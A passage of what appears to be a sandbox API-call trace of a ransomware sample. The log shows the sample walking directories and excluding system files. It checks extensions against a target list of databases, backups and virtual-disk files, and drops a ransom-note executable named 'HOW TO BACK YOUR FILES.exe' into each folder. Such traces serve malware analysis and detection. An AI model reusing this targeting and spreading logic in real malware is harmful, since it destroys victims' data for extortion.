[0041.318] lstrlenW (lpString="sas7bdat") returned 8 [0041.318] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0041.318] lstrlenW (lpString="sbf") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0041.318] lstrlenW (lpString="scx") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0041.318] lstrlenW (lpString="sdb") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0041.318] lstrlenW (lpString="sdc") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0041.318] lstrlenW (lpString="sdf") returned 3 [0041.318] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0041.375] lstrlenW (lpString="sis") returned 3 [0041.375] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0041.375] lstrlenW (lpString="spq") returned 3 [0041.375] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0041.375] lstrlenW (lpString="te") returned 2 [0041.375] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0041.375] lstrlenW (lpString="teacher") returned 7 [0041.375] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0041.375] lstrlenW (lpString="tmd") returned 3 [0041.375] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0041.375] lstrlenW (lpString="tps") returned 3 [0041.375] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0041.375] lstrlenW (lpString="trc") returned 3 [0041.375] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0041.375] lstrlenW (lpString="trc") returned 3 [0041.375] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0041.375] lstrlenW (lpString="trm") returned 3 [0041.375] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0041.375] lstrlenW (lpString="udb") returned 3 [0041.375] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0041.375] lstrlenW (lpString="udl") returned 3 [0041.375] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0041.375] lstrlenW (lpString="usr") returned 3 [0041.376] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0041.376] lstrlenW (lpString="v12") returned 3 [0041.376] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0041.376] lstrlenW (lpString="vis") returned 3 [0041.376] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0041.376] lstrlenW (lpString="vpd") returned 3 [0041.376] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0041.376] lstrlenW (lpString="vvv") returned 3 [0041.376] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0041.376] lstrlenW (lpString="wdb") returned 3 [0041.376] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0041.376] lstrlenW (lpString="wmdb") returned 4 [0041.376] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0041.376] lstrlenW (lpString="wrk") returned 3 [0041.376] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0041.376] lstrlenW (lpString="xdb") returned 3 [0041.376] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0041.376] lstrlenW (lpString="xld") returned 3 [0041.376] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0041.376] lstrlenW (lpString="xmlff") returned 5 [0041.376] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0041.376] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a3658a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a3658a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.376] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.376] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedb45673, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0041.376] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.376] lstrcmpiW (lpString1="Low", lpString2="aoldtz.exe") returned 1 [0041.376] lstrcmpiW (lpString1="Low", lpString2=".") returned 1 [0041.376] lstrcmpiW (lpString1="Low", lpString2="..") returned 1 [0041.376] lstrcmpiW (lpString1="Low", lpString2="windows") returned -1 [0041.376] lstrcmpiW (lpString1="Low", lpString2="bootmgr") returned 1 [0041.376] lstrcmpiW (lpString1="Low", lpString2="temp") returned -1 [0041.376] lstrcmpiW (lpString1="Low", lpString2="pagefile.sys") returned -1 [0041.377] lstrcmpiW (lpString1="Low", lpString2="boot") returned 1 [0041.377] lstrcmpiW (lpString1="Low", lpString2="ids.txt") returned 1 [0041.377] lstrcmpiW (lpString1="Low", lpString2="ntuser.dat") returned -1 [0041.377] lstrcmpiW (lpString1="Low", lpString2="perflogs") returned -1 [0041.377] lstrcmpiW (lpString1="Low", lpString2="MSBuild") returned -1 [0041.377] lstrlenW (lpString="Low") returned 3 [0041.377] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\desktop.ini") returned 73 [0041.377] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="Low" | out: lpString1="Low") returned="Low" [0041.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0041.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x84) returned 0x2e9eb0 [0041.377] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23c8 | out: ListHead=0x2e77d0, ListEntry=0x2d23c8) returned 0x2d23a8 [0041.377] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="aoldtz.exe") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2=".") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="..") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="windows") returned -1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="bootmgr") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="temp") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="pagefile.sys") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="boot") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="ids.txt") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="ntuser.dat") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="perflogs") returned 1 [0041.377] lstrcmpiW (lpString1="Virtualized", lpString2="MSBuild") returned 1 [0041.377] lstrlenW (lpString="Virtualized") returned 11 [0041.377] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned 65 [0041.377] lstrcpyW (in: lpString1=0x2e2e8dc, lpString2="Virtualized" | out: lpString1="Virtualized") returned="Virtualized" [0041.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0041.377] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x2cb428 [0041.377] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d23e8 | out: ListHead=0x2e77d0, ListEntry=0x2d23e8) returned 0x2d23c8 [0041.377] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Virtualized", cAlternateFileName="VIRTUA~1")) returned 0 [0041.378] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.378] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23e8 [0041.378] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized" [0041.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb428 | out: hHeap=0x2b0000) returned 1 [0041.378] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0041.378] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized") returned 73 [0041.378] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized" [0041.378] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.378] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.382] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.382] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.383] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.383] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.383] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.383] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.383] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.383] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.383] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.383] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.383] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a423f80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.383] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.383] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a423f80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0041.383] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.383] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23c8 [0041.383] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low" [0041.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0041.383] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0041.383] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned 65 [0041.383] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low" [0041.383] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.383] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.387] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.387] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.388] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.388] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.388] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.388] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.388] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.388] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.388] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.388] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.388] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a44a0e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0041.388] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0041.388] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a44a0e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0041.388] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0041.388] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d23a8 [0041.388] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5" [0041.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb388 | out: hHeap=0x2b0000) returned 1 [0041.388] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0041.388] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned 73 [0041.388] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5" [0041.388] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0041.388] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 1 [0041.443] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.443] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd028 [0041.443] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.443] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0041.443] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.443] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4bc500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4bc500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.443] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.443] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0041.443] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.443] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.443] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x661a180, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x661a180, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e570c75, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.443] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0041.443] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0041.443] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0041.443] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0041.444] lstrlenW (lpString="desktop.ini") returned 11 [0041.444] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\*") returned 75 [0041.444] lstrcpyW (in: lpString1=0x2e2e8f4, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0041.444] lstrlenW (lpString="desktop.ini") returned 11 [0041.444] lstrlenW (lpString="Ares865") returned 7 [0041.444] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0041.444] lstrlenW (lpString=".dll") returned 4 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0041.444] lstrlenW (lpString=".lnk") returned 4 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0041.444] lstrlenW (lpString=".ini") returned 4 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0041.444] lstrlenW (lpString=".sys") returned 4 [0041.444] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0041.444] lstrlenW (lpString="desktop.ini") returned 11 [0041.444] lstrlenW (lpString="bak") returned 3 [0041.444] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0041.444] lstrlenW (lpString="ba_") returned 3 [0041.444] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0041.444] lstrlenW (lpString="dbb") returned 3 [0041.444] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0041.444] lstrlenW (lpString="vmdk") returned 4 [0041.444] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0041.444] lstrlenW (lpString="rar") returned 3 [0041.444] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0041.445] lstrlenW (lpString="zip") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0041.445] lstrlenW (lpString="tgz") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0041.445] lstrlenW (lpString="vbox") returned 4 [0041.445] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0041.445] lstrlenW (lpString="vdi") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0041.445] lstrlenW (lpString="vhd") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0041.445] lstrlenW (lpString="vhdx") returned 4 [0041.445] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0041.445] lstrlenW (lpString="avhd") returned 4 [0041.445] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0041.445] lstrlenW (lpString="db") returned 2 [0041.445] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0041.445] lstrlenW (lpString="db2") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0041.445] lstrlenW (lpString="db3") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0041.445] lstrlenW (lpString="dbf") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0041.445] lstrlenW (lpString="mdf") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0041.445] lstrlenW (lpString="mdb") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0041.445] lstrlenW (lpString="sql") returned 3 [0041.445] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0041.445] lstrlenW (lpString="sqlite") returned 6 [0041.445] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0041.445] lstrlenW (lpString="sqlite3") returned 7 [0041.445] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0041.445] lstrlenW (lpString="sqlitedb") returned 8 [0041.446] lstrcmpiW (lpString1="ktop.ini", 